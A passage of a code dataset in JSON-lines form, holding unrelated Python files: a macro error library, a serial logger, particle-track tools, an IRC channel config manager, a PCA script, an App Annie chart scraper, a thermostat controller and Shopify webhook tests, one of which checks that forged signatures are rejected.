= Error(\"e17\", \"Parameter Repeated\")\n e.verbose = lambda args: \"Parameter \\\"\" + args[1] + \"\\\" is defined more than once in macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e18 args: 0 - name of macro with definition\n e = Error(\"e18\", \"Unfinished Definition\")\n e.verbose = lambda args: \"The input ended inside the definition of macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # Macro Call Errors\n # e20 args: 0 - name of undefined macro\n e = Error(\"e20\", \"Undefined Macro\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was not defined.\"\n lib.library.append(e)\n \n # e21 args: 0 - name of macro in question\n # 1 - amount of used parameters\n # 2 - amount of needed parameters\n e = Error(\"e21\", \"Too Few Arguments\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was called with \" + args[1] + \" parameters, but defined with \" + args[2] + \".\"\n lib.library.append(e)\n \n # e22 args: 0 - name of incorrect macro\n e = Error(\"e22\", \"Incorrect Macro Call\")\n e.verbose = lambda args: \"Unexpected character encountered in macro call \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e23 args: 0 - name of macro with call\n e = Error(\"e23\", \"Nested Call\")\n e.verbose = lambda args: \"Another acro called inside macro call of \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e24 args: 0 - name of macro with definition\n e = Error(\"e24\", \"Nested Definition\")\n e.verbose = lambda args: \"Another macro defined inside macro call of \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n\n # e25 args: 0 - name of macro with definition\n e = Error(\"e25\", \"Unfinished Call\")\n e.verbose = lambda args: \"The input ended inside the call of macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n\n # Other Errors\n # e98 args: 0 - message\n e = Error(\"e98\", \"I/O Error\")\n e.verbose = lambda args: \"There was an error with file I/O: \" + args[0] + \".\"\n lib.library.append(e)\n\n # Warnings\n\n # Macro Definition Warnings\n # w10 args: 0 - name of the macro\n # 1 - name of the parameter\n e = Error(\"w10\", \"Unused Parameter\")\n e.verbose = lambda args: \"Parameter \\\"\" + args[1] + \"\\\" unused in macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # w11 args: 0 - name of macro with empty body\n e = Error(\"w11\", \"Empty Macro Body\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" has an empty body.\"\n lib.library.append(e)\n \n # w12 args: 0 - name of unused macro\n e = Error(\"w12\", \"Unused Macro\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was defined, but not called.\"\n lib.library.append(e)\n\n # Macro Call Warnings\n \n # w20 args: 0 - name of the macro\n # 1 - amount of used parameters\n # 2 - amount of needed parameters\n e = Error(\"w20\", \"Too Many Arguments\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was called with \" + args[1] + \" arguments, but defined with \" + args[2] + \".\"\n lib.library.append(e)\n \n # w21 args: 0 - name of the macro\n # 1 - name of the argument\n e = Error(\"w21\", \"Empty Argument\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was called with an empty argument \\\"\" + args[1] + \"\\\".\"\n lib.library.append(e)\n\n # w22 args: 0 - name of the macro\n # 1 - name of the argument\n e = Error(\"w22\", \"Whitespace Argument\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was called with an argument \\\"\" + args[1] + \"\\\" starting with 
whitespace. Possibly unmeant behaviour.\"\n lib.library.append(e)\n\n # CLI Warnings\n # w80 args: 0 - filename\n e = Error(\"w80\", \"Overwrite Warning\")\n e.verbose = lambda args: \"The input file is the same as the output file: \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n\n # Other Warnings\n # w90 args 0 - character\n e = Error(\"w90\", \"Escape Character Error\")\n e.verbose = lambda args: \"Escape Character was used on a non-special character: \\'\" + args[0] + \"\\'.\"\n lib.library.append(e)\n\n return lib\n\nif __name__ == \"__main__\":\n # Printing macro library for debug purposes\n for e in get_error_lib().library:\n print(e.code + \" \" + e.name)\n print(e.what_short(10))\n print(e.what_long(20, [\"arg0\", \"arg1\", \"arg2\"]))","sub_path":"src/error/errorlibrary.py","file_name":"errorlibrary.py","file_ext":"py","file_size_in_byte":7767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"584964663","text":"import os, csv, serial\n\nser = serial.Serial('COM3', 9600)\nser.flushInput()\n\n\ncsv_path = os.path.dirname(os.path.abspath(__file__)) + \"\\serial_log.csv\"\nprint(csv_path)\nwith open(csv_path, mode='w', newline='') as file:\n writer = csv.writer(file, dialect=\"excel\")\n while True:\n str = ser.readline().decode('utf-8')\n row = str.split()\n print(row)\n writer.writerow(row)\n","sub_path":"Log_serial_csv.py","file_name":"Log_serial_csv.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"336004760","text":"import numpy as np\n\n\ndef create_hits(X, Y, Z, E):\n\n '''Given the X, Y, Z and E arrays, it creates a\n numpy array with labeled columns: X, Y, Z, E and index.\n The index column is initialized to (0, 0) for each hits\n\n Arguments:\n X, Y, Z, E: np.array\n\n Examples:\n _ _ _ _ _\n\n >>> X = np.array([0, 1, 2])\n >>> Y = np.array([3, 4, 5])\n >>> Z = np.array([6, 7, 8])\n >>> E = np.array([9, 10, 11])\n\n >>> create_hits(X, Y, Z, E)\n array([(0, 3, 6, 9, (0, 0, 0),\n (1, 4, 7, 10, (0, 0, 0),\n (2, 5, 8, 11, (0, 0, 0)),\n dtype=[('X', '>> arr = np.array([1, 2, 10, 11, 12])\n >>> fill_complementary_hits(arr, d=1)\n array([1, 2, 6, 10, 11, 12])\n\n '''\n\n diff = C[1:] - C[:-1]\n sel = diff > d\n\n if ~sel.any():\n return C\n\n idxs = np.argwhere(sel).flatten() + 1\n splited_C = np.split(C, idxs)\n\n for i in range(0, len(splited_C)-1):\n splited_C.append( np.array([ (splited_C[i][-1] + splited_C[i+1][0])/2. 
]) )\n\n filled_C = []\n for sp in splited_C:\n filled_C.extend( sp )\n filled_C = np.sort(filled_C)\n\n return filled_C\n\n\ndef index_hits(hits, dx=10, dy=10, dz=2.5):\n\n '''Given a hits array created with create_hits function,\n returns the same hits indexed with its complementary fill.\n\n Arguments:\n hits: np.array\n dx, dy, dz: number (float or int)\n\n Examples:\n _ _ _ _ _\n\n >>> X = np.array([0, 1, 5, 6])\n >>> Y = np.array([0, 0, 0, 0])\n >>> Z = np.array([0, 0, 0, 0])\n >>> E = np.array([0, 0, 0, 0])\n\n >>> hits = create_hits(X, Y, Z, E)\n >>> index_hits(hits, dx=1)\n array([(0., 0., 0., 0., (0, 0, 0)),\n (1., 0., 0., 0., (1, 0, 0)),\n (5., 0., 0., 0., (3, 0, 0)),\n (6., 0., 0., 0., (4, 0, 0))],\n dtype=[('X', '>> X = np.array([0, 1, 5, 6])\n >>> Y = np.array([0, 0, 0, 0])\n >>> Z = np.array([0, 0, 0, 0])\n >>> E = np.array([0, 0, 0, 0])\n\n >>> hits = create_hits(X, Y, Z, E)\n >>> hits = index_hits(hits, dx=1)\n >>> print(hits)\n array([(0., 0., 0., 0., (0, 0, 0)),\n (1., 0., 0., 0., (1, 0, 0)),\n (5., 0., 0., 0., (3, 0, 0)),\n (6., 0., 0., 0., (4, 0, 0))],\n dtype=[('X', '>> track_splitter(hits)\n [array([(0., 0., 0., 0., (0, 0, 0)),\n (1., 0., 0., 0., (1, 0, 0))],\n dtype=[('X', '0:\n H = []\n H.append( hits[0] )\n hits = np.delete(hits, 0, axis=0)\n\n for h in H:\n for n in neig:\n idxs = np.array(list(hits[\"index\"]))\n if len(idxs)==0: break\n\n x = np.isin(idxs[:, 0], h[\"index\"][0] + n[0])\n y = np.isin(idxs[:, 1], h[\"index\"][1] + n[1])\n z = np.isin(idxs[:, 2], h[\"index\"][2] + n[2])\n\n sel = (x & y & z)\n if sel.any():\n i = np.argwhere( sel ).flatten()[0]\n\n H.append(hits[i])\n hits = np.delete(hits, i, axis=0)\n\n H = np.array(H)\n T.append(H)\n\n return T\n","sub_path":"track_id.py","file_name":"track_id.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"321488071","text":"from setuptools import setup, find_packages\nfrom Cython.Build import cythonize\n# run with\n# python setup.py build_ext --inplace\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"l2race\", # Replace with your own username\n version=\"2.0.1\",\n author=\"Marcin Paluch, Antonio Rios, Chang Gao, Tobi Delbruck\",\n author_email=\"tobi@ini.uzh.ch,marcin.paluch1994@gmail.com,arios@us.es\",\n description=\"L2RACE challenge for Telluride Neuromorphic workshop\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/neuromorphs/l2race\",\n packages=find_packages(),\n scripts=['main.py','servery.py'],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: CC License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n ext_modules = cythonize([\n \"commonroad/vehicleDynamics_MB.pyx\",\n \"commonroad/vehicleDynamics_ST.pyx\",\n \"commonroad/tireModel.pyx\", \n # \"commonroad/longitudinalParameters.py\",\n \"commonroad/accelerationConstraints.pyx\",\n \"commonroad/steeringConstraints.pyx\",\n # \"commonroad/tireParameters.py\",\n # \"commonroad/vehicleParameters.py\",\n # \"commonroad/steeringParameters.py\",\n \"commonroad/unitConversions/unitConversion.pyx\",\n # \"commonroad/parameters_vehicle1.py\",\n # \"commonroad/parameters_vehicle2.py\",\n # \"commonroad/parameters_vehicle3.py\",\n ], compiler_directives={'language_level' : \"3\"})\n)\n\n# needs to be run on server after touching any of the pyx files with \"python setup.py 
build_ext --inplace\"\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"218049154","text":"from collections import deque\nimport sys\n\n\n\n\nf = open(\"input\")\nnOfCase = int(f.readline())\n\n\nfor i in xrange(nOfCase):\n N = int(f.readline())\n d = {}\n for j in xrange(2*N-1):\n row = [int(x) for x in f.readline().strip().split()]\n #print row\n for x in row:\n d[x]=d.get(x,0)+1\n lst = []\n for x in d.items():\n #print x\n if x[1] % 2 != 0:\n lst.append(x[0])\n #lst = x[0] if x[1] %2 != 0 for x in d.items\n lst.sort()\n sys.stdout.write(\"Case #%d: \" % (i+1))\n for elem in lst[0:-1]:\n sys.stdout.write(str(elem)+\" \")\n sys.stdout.write(str(lst[-1]))\n sys.stdout.write('\\n')\n","sub_path":"solutions_5630113748090880_1/Python/BigDuck/RankAndFile.py","file_name":"RankAndFile.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"419723672","text":"import configparser\nimport logging\n\nimport irccm\n\nlogger = logging.getLogger(__name__)\n\n\nclass INIConfManager(irccm.ConfManager):\n \"\"\"Configuration management interface for INI files.\"\"\"\n def __init__(self, args):\n self.__args = args\n self.__conf = None\n self.__file = None\n self.__sections = None\n\n self.conf.read_file(open(self.file))\n\n @property\n def args(self):\n \"\"\"Command line arguments namespace.\"\"\"\n return self.__args\n\n # TODO: Should the logic here be decoupled from self.args?\n def add(self):\n \"\"\"Add a channel entry to a host section.\"\"\"\n # Get a section object, because it's easier to deal with.\n if self.conf.has_section(self.args.host):\n section = self.conf[self.args.host]\n else:\n # If section does not exist, make it and continue.\n self.conf.add_section(self.args.host)\n section = self.conf[self.args.host]\n\n channels = section.get('channels', None)\n if channels is not None:\n new_chans = self.args.channels\n channels = channels.split(',')\n channels = ','.join(new_chans + channels)\n section['channels'] = self.format_channels(channels)\n else:\n channels = self.format_channels(','.join(self.args.channels))\n section['channels'] = channels\n\n self.conf.write(open(self.file, 'w'))\n return True\n\n @property\n def conf(self):\n \"\"\"The Python object wrapping this configuration file.\"\"\"\n if self.__conf is None:\n self.__conf = configparser.ConfigParser()\n\n return self.__conf\n\n @property\n def file(self):\n \"\"\"The file path of this configuration file.\"\"\"\n if self.__file is None:\n self.__file = self.args.conf_file\n\n return self.__file\n\n def format_channels_per_section(self):\n \"\"\"Format channels in each section.\"\"\"\n for section in self.sections:\n if 'channels' in section:\n self.conf[section.name]['channels'] = \\\n self.format_channels(section['channels'])\n\n def get_sections(self):\n \"\"\"Get the section objects of self.conf.\"\"\"\n sections = []\n for section in self.conf.sections():\n # Indexing returns a Section object.\n sections.append(self.conf[section])\n return sections\n\n # TODO: Should the logic here be decoupled from self.args?\n def remove(self):\n \"\"\"Remove a channel entry from a host section.\"\"\"\n # Get a section object, because it's easier to deal with.\n if self.conf.has_section(self.args.host):\n section = self.conf[self.args.host]\n else:\n # If the section does not exist, finish.\n message = 
('The specified host \"%s\" does not exist.'\n                       % self.args.host)\n            logger.debug(message)\n            return False\n\n        channels = section.get('channels', None)\n        if channels is not None:  # 'channels' key exists.\n            chans_to_rm = self.format_channels(','.join(self.args.channels))\n            channels = channels.split(',')\n            channels = [chan for chan in channels if chan not in chans_to_rm]\n\n            # Channels is either None, [], or a populated list.\n            if channels:\n                section['channels'] = self.format_channels(','.join(channels))\n            else:\n                # No more channels left, so remove the key.\n                section.pop('channels')\n\n        self.conf.write(open(self.file, 'w'))\n        return True\n\n    @property\n    def sections(self):\n        \"\"\"The section objects of this conf file.\"\"\"\n        if self.__sections is None:\n            self.__sections = self.get_sections()\n\n        return self.__sections\n","sub_path":"irccm/managers/inicm.py","file_name":"inicm.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"402017047","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing  # for standardizing the data\nf = open('C:/Users/刘青源/Desktop/主成分分析数据.csv')\ndf_data=pd.read_csv(f,sep=',')\ndata_x=df_data.iloc[:,1:7];\ndata_y=data_x.T\nprint('Correlation coefficient matrix:')\nr=np.corrcoef(data_y)  # compute the correlation coefficient matrix\nprint(r)\ndata_X=df_data.iloc[:,2:7]\ndata_X=preprocessing.scale(data_X)  # standardize the matrix\ndata_yy=data_X.T\nr=np.corrcoef(data_yy)\nr=np.round(r,3)\nv,d=np.linalg.eig(r)  # v: eigenvalues, d: eigenvectors\npca = PCA(n_components=5)\npca.fit(data_X)\nprint('Contribution ratio of each component:')\nprint(pca.explained_variance_ratio_)\nF=-1*(np.dot(data_X,d[:,0]))  # compute the principal component scores\nprint('Principal component scores:')\nprint(F)\n# merge cities and scores column-wise\ncity=df_data.iloc[:,0]\ncity=city.T\ncity=city.tolist()\nF=F.tolist()\nzoo=np.vstack((city,F))\nzoo=zoo.T\nzoo=zoo[np.lexsort(zoo.T)]\nprint(zoo[::-1,:])\n\n\n","sub_path":"主成分分析.py","file_name":"主成分分析.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"493837920","text":"\"\"\"\nExample of private variables and name mangling\n\"\"\"\n\nclass Mapping:\n    def __init__(self, iterable):\n        self.items_list = []\n        self.__update(iterable)\n    def update(self, iterable):\n        for item in iterable:\n            self.items_list.append(item)\n\n    __update = update\n\nclass MappingSubclass(Mapping):\n    def update(self, keys, values):\n        # provides new signature for update()\n        # but doesn't break __init__()\n        for item in zip(keys, values):\n            self.items_list.append(item)\n\ninstance = Mapping(\"4\")\ninstance.update(\"7\")\nprint(instance.items_list)\ninstance_2 = MappingSubclass(\"4\")\ninstance_2.update(\"4\",\"8\")\nprint(instance_2.items_list)","sub_path":"OOP/private_variables.py","file_name":"private_variables.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"57940289","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 22 23:09:46 2020\n\n@author: nouma\n\"\"\"\n\nfrom selenium import webdriver\nimport pandas as pd\nimport time\nfrom selenium.webdriver.firefox.options import Options\n\noptions = Options()\nbrowser = webdriver.Firefox(options=options)\n\nbrowser.get('https://www.appannie.com/apps/google-play/top-chart/?country=US&category=40&device=&date=2020-05-08&feed=Free&rank_sorting_type=rank&page_number=0&page_size=200&table_selections=')\n\ndf = pd.DataFrame(columns=['App', 'Development Company', 'Free 
Rank', 'Grossing Rank', 'New Free Rank', 'URL', 'Star Rating', 'Ratings', 'Release Date', 'Last update date'])\n\nusername = input('Enter your email address:')\npassword = input('Enter your password:')\nwhile(True):\n try:\n browser.find_element_by_xpath(\"//input[@name='username']\").send_keys(username)\n browser.find_element_by_xpath(\"//input[@type='password']\").send_keys(password)\n browser.find_element_by_xpath(\"//button[@type='submit']\").click()\n break\n except:\n continue\ntime.sleep(10)\nrows = browser.find_elements_by_xpath(\"//tr[@class='main-row table-row']\")\n\nwhile(len(rows) == 0):\n time.sleep(10)\n rows = browser.find_elements_by_xpath(\"//tr[@class='main-row table-row']\")\n time.sleep(1)\nfor row in rows:\n try:\n \n cells = row.find_elements_by_tag_name('td')\n str = row.find_element_by_tag_name('a').get_attribute('href')\n rate = cells[10].text\n \n app = cells[1].text[:-1].split('\\n')[0]\n development = cells[1].text[:-1].split('\\n')[1]\n free_rank = cells[2].text\n grossing_rank = cells[4].text\n new_free_rank = cells[6].text\n url = 'https://play.google.com/store/apps/details?id='+str[46:].replace('/details/','')\n star_rating = cells[9].text\n ratings = rate.replace(',','')\n release_date = cells[11].text\n last_update_date = cells[12].text\n \n ser = pd.Series([app, development, free_rank, grossing_rank, new_free_rank, url, star_rating, ratings, release_date, last_update_date], index = df.columns)\n df = df.append(ser, ignore_index=True)\n print('{} done'.format(len(df)))\n except:\n break\nbrowser.quit()\ndf.to_excel('word_game_andoid_free.xlsx')\n","sub_path":"word_game_android_free.py","file_name":"word_game_android_free.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"162937523","text":"from django.conf.urls import patterns, url\nfrom staticpages import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='home'),\n url(r'^api(.html)?$', views.api, name='api'),\n url(r'^feedback$', views.feedback, name='feedback'),\n url(r'^feedback_submit$', views.feedback_submit, name='feedback_submit'),\n url(r'^feedback_sent$', views.feedback_sent, name='feedback_sent'),\n)\n","sub_path":"courtfinder/staticpages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"317469328","text":"import base64\nfrom maxcube.device import \\\n MaxDevice, \\\n MAX_DEVICE_MODES\n\n\nclass MaxThermostat(MaxDevice):\n def __init__(self):\n super(MaxThermostat, self).__init__()\n self.mode = None\n self.mode_name = None\n self.min_temperature = None\n self.max_temperature = None\n self.actual_temperature = None\n self.target_temperature = None\n self.valve_position = None\n\n def todict(self):\n d = super(MaxThermostat, self).todict()\n h = {\n \"mode\": self.mode_name,\n \"mode_id\": self.mode,\n \"min_temperature\": self.min_temperature,\n \"max_temperature\": self.max_temperature,\n \"actual_temperature\": self.actual_temperature,\n \"target_temperature\": self.target_temperature,\n \"valve_position\": self.valve_position\n }\n return { **d, **h }\n\n\n def set_temperature(self, temperature, mode=\"manual\"):\n self.cube.logger.debug('Setting temperature for %s to %s!' 
%(self.rf_address, temperature))\n mode_id = MAX_DEVICE_MODES.index(mode)\n rf_address = self.rf_address\n if len(rf_address) < 6:\n rf_address = '0' + rf_address\n room = str(self.room_id)\n if self.room_id < 10:\n room = '0' + room\n target_temperature = int(temperature * 2) + (mode_id << 6)\n\n byte_cmd = '000440000000' + rf_address + room + hex(target_temperature)[2:]\n self.cube.logger.debug('Request: ' + byte_cmd)\n command = 's:' + base64.b64encode(bytearray.fromhex(byte_cmd)).decode('utf-8') + '\\r\\n'\n self.cube.logger.debug('Command: ' + command)\n\n self.cube.connection.connect()\n self.cube.connection.send(command)\n self.cube.logger.debug('Response: ' + self.cube.connection.response)\n a = self.cube.parse_s_message(self.cube.connection.response)\n self.cube.connection.disconnect()\n if a.result:\n self.target_temperature = int(temperature * 2) / 2.0\n a.device = self\n return a\n","sub_path":"maxcube/thermostat.py","file_name":"thermostat.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"83812061","text":"from django.conf.urls import patterns, include, url\nfrom Supplier.forms import SupplierDeliveryForm\nfrom Indigo7.views import SimpleViewListView, SimpleViewDetailView, SimpleViewCreateView, SimpleViewDeleteView, SimpleViewUpdateView\nfrom Supplier.models import SupplierDelivery\n\n\nurlpatterns = patterns('Supplier.views', \n url(r'^$',\n SimpleViewListView.as_view(model=SupplierDelivery, paginate_by=14), \n name='supplier_delivery_list'),\n \n url(r'^create/$',\n SimpleViewCreateView.as_view(model=SupplierDelivery, \n form_class=SupplierDeliveryForm, \n success_url='supplier_delivery_list'), \n name='supplier_delivery_create_delivery'), \n \n url(r'^update/(?P\\d+)/$',\n SimpleViewUpdateView.as_view(model=SupplierDelivery, \n form_class=SupplierDeliveryForm, \n success_url='supplier_delivery_list'), \n name='supplier_delivery_update_delivery'), \n \n url(r'^view/(?P\\d+)/$',\n SimpleViewDetailView.as_view(\n model=SupplierDelivery, \n ), \n name='supplier_delivery_view'), \n\n url(r'^delete/(?P\\d+)/$',\n SimpleViewDeleteView.as_view(model=SupplierDelivery, \n success_url='supplier_delivery_list'), \n name='supplier_delivery_delete_delivery'), \n)","sub_path":"Supplier/urlconf/delivery.py","file_name":"delivery.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"395285361","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 2 21:58:05 2019\n\n@author: jocel\n\"\"\"\n\n#Exercise 2\nprices = {\n\"banana\": 4,\n\"apple\": 2,\n\"orange\": 1.5,\n\"pear\": 3\n}\n\nstock = {\n \"banana\" : 6,\n \"apple\" : 0,\n \"orange\" : 32,\n \"pear\" : 15,\n}\n\nfor i in prices:\n print(i)\n print(\"price: \", prices[i])\n print(\"stock: \", stock[i])\n \ntotal = 0\nfor i in prices: \n total += prices[i] * stock[i]\nprint(total)","sub_path":"List-and-Dictionary-Exercise2.py","file_name":"List-and-Dictionary-Exercise2.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"102793862","text":"import base64\nimport datetime\nimport hashlib\nimport hmac\nimport httplib\nimport json\nfrom datetime import timedelta\n\nimport pytz\nfrom flask import current_app\nfrom lettuce import step, world\nfrom nose.tools import assert_equals, assert_true, assert_is_not_none\n\nfrom constants import *\nfrom 
controllers.order import create_review_requests_for_order\nfrom features.steps.core import TestAPI\nfrom features.steps.mocks import create_new_order\nfrom lib import get_utcnow\nfrom store import database\n\n\n@step('Someone tries to fake a shopify webhook request')\ndef fake_webhook_request(step):\n data = json.dumps({})\n sha256 = \"FAKE_SHA_SIGNATURE\"\n response = world.client.post(\"/platform/shopify/products/create\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Return invalid signature')\ndef return_invalid_signature(step):\n assert world.local.response.status_code == 403\n step.behave_as('I see the response contains \"{response}\"'.format(response=\"Invalid signature.\"))\n\n\n@step('Shopify notifies us about a product creation')\ndef shopify_webhook_product_creation(step):\n data = json.dumps(REQUEST_NEW_PRODUCT)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/create\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about a product update')\ndef shopify_webhook_product_update(step):\n data = json.dumps(REQUEST_PRODUCT_UPDATE)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about a product 12345 deletion')\ndef shopify_webhook_product_delete(step):\n data = json.dumps(REQUEST_PRODUCT_DELETE)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/delete\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('We create a corresponding new product in our database')\ndef webhook_creates_product(step):\n assert world.local.response.status_code == 201\n product = database.Product.get_one_by(platform_product_id=str(NEW_PRODUCT_ID))\n world.product = product\n assert product.name == NEW_PRODUCT_NAME\n assert product.description == NEW_PRODUCT_DESCRIPTION\n assert product.image_url == NEW_PRODUCT_IMAGE_URL\n assert product.vendor == NEW_PRODUCT_VENDOR\n assert product.categories == NEW_PRODUCT_CATEGORIES\n\n\n@step('Product with id 12345 has variants in database')\ndef webhook_creates_product_variants(step):\n assert_equals(len(world.product.variants), 2)\n assert_is_not_none(database.ProductVariant.get_by(id=1234567))\n assert_is_not_none(database.ProductVariant.get_by(id=1234568))\n\n\n@step('We update the corresponding product in our database')\ndef webhook_updates_product(step):\n assert world.local.response.status_code == 200\n product = database.Product.get_one_by(platform_product_id=str(NEW_PRODUCT_ID))\n assert product.name == NEW_PRODUCT_NAME_UPDATED\n\n\n@step(\"A product already exists with 
platform_product_id 12345\")\ndef product_already_exists_12345(step):\n shop = database.Shop.get_one()\n product1 = database.Product.create(shop=shop,\n platform_product_id=NEW_PRODUCT_ID,\n name=NEW_PRODUCT_NAME,\n description=NEW_PRODUCT_DESCRIPTION,\n image_url=NEW_PRODUCT_IMAGE_URL,\n vendor=NEW_PRODUCT_VENDOR,\n categories=NEW_PRODUCT_CATEGORIES)\n\n product2 = database.Product.create(shop=shop,\n platform_product_id=NEW_PRODUCT2_ID,\n name=NEW_PRODUCT2_NAME,\n description=NEW_PRODUCT2_DESCRIPTION,\n image_url=NEW_PRODUCT2_IMAGE_URL,\n vendor=NEW_PRODUCT2_VENDOR,\n categories=NEW_PRODUCT2_CATEGORIES)\n\n product_1_variant_1 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_1_ID,\n name=PRODUCT_1_VARIANT_1_NAME,\n price=PRODUCT_1_VARIANT_1_PRICE,\n currency=PRODUCT_VARIANT_CURRENCY)\n product_1_variant_2 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_2_ID,\n name=PRODUCT_1_VARIANT_2_NAME,\n price=PRODUCT_1_VARIANT_2_PRICE,\n currency=PRODUCT_VARIANT_CURRENCY)\n product1.variants.append(product_1_variant_1)\n product1.variants.append(product_1_variant_2)\n\n product_2_variant_1 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_3_ID,\n name=PRODUCT_2_VARIANT_1_NAME,\n price=PRODUCT_2_VARIANT_1_PRICE,\n currency=PRODUCT_VARIANT_CURRENCY)\n product2.variants.append(product_2_variant_1)\n\n database.add(product1)\n database.add(product2)\n database.push()\n\n\n@step(\"A product already exists with platform_product_id 123 for plugin page\")\ndef product_already_exists_123(step):\n shop = database.Shop.get_one()\n product1 = database.Product.create(shop=shop,\n platform_product_id=NEW_PRODUCT_ID_PLUGIN,\n name=NEW_PRODUCT_NAME,\n description=NEW_PRODUCT_DESCRIPTION,\n image_url=NEW_PRODUCT_IMAGE_URL,\n vendor=NEW_PRODUCT_VENDOR,\n categories=NEW_PRODUCT_CATEGORIES)\n\n product_1_variant_1 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_1_ID,\n name=PRODUCT_1_VARIANT_1_NAME,\n price=PRODUCT_1_VARIANT_1_PRICE,\n currency=PRODUCT_VARIANT_CURRENCY)\n product_1_variant_2 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_2_ID,\n name=PRODUCT_1_VARIANT_2_NAME,\n price=PRODUCT_1_VARIANT_2_PRICE,\n currency=PRODUCT_VARIANT_CURRENCY)\n product1.variants.append(product_1_variant_1)\n product1.variants.append(product_1_variant_2)\n\n database.add(product1)\n database.push()\n\n\n@step('Review requests exist for an order id (\\d+)')\ndef create_review_requests(step, order_id):\n create_review_requests_for_order(order_id)\n\n\n@step(\"A product already exists with platform_product_id 666\")\ndef product_already_exists_666(step):\n product = database.Product.create(platform_product_id=NEW_ORDER_PRODUCT_2_ID)\n\n product_variant_3 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_3_ID)\n\n product.variants.append(product_variant_3)\n database.add(product)\n database.push()\n\n\n@step(\"There is only one product with platform_product_id 12345\")\ndef webhook_does_not_create_a_new_product(step):\n products = database.Product.get_by(platform_product_id=str(NEW_PRODUCT_ID))\n assert len(products) == 